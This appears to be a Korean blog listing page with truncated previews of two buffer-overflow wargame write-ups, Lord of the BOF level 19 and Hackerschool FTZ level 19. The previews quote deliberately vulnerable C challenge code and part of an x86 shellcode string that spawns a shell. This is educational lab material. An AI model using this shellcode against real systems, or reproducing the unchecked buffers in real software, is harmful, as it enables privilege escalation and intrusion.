19
![[LOB] Level19: nightmare → xavius](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F993D173A5B719A4C25)
[LOB] Level19: nightmare → xavius
xavius /* The Lord of the BOF : The Fellowship of the BOF - xavius - arg */ #include #include #include main() { char buffer[40]; char *ret_addr; // overflow! fgets(buffer, 256, stdin); printf("%s\n", buffer); if(*(buffer+47) == '\xbf') { printf("stack retbayed you!\n"); exit(0); } if(*(buffer+47) == '\x08') { printf("binary image retbayed you, too!!\n"); exit(0); } // check if the ret_addr is li..
![[해커스쿨] FTZ level19 풀이과정](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F2466B54E5876DAC40D)
[해커스쿨] FTZ level19 풀이과정
2017/01/12 - [Study :)/FTZ] - [해커스쿨] FTZ level18 풀이과정 main() { char buf[20]; gets(buf); printf("%s\n",buf); } 힌트를 보면, buf사이즈는 20Byte이다. buf에 쉘코드를 넣기에는 작은 사이즈이므로, 환경변수에 쉘코드를 넣고 시작하자. //getenv.c main(){ printf("[%08p]\n", getenv("SHELL") ); } ShellCode(41Byte) \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe..